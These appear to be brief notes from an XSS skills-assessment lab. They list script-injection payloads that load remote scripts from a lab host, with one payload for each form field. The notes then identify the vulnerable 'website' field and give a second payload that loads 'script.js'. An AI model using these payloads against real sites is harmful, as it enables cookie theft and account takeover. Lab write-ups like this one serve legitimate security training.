XSS
Skills Assessment
"><script src="http://10.10.14.99/comment"></script>
"><script src="http://10.10.14.99/name"></script>
"><script src="http://10.10.14.99/website"></script>
Inject the above payloads one by one to find which is vulnerable to XSS.
/website is vulnerable to XSS
change remote script payload to "><script src="http://10.10.14.99/script.js"></script> and inject to /website input.
Last updated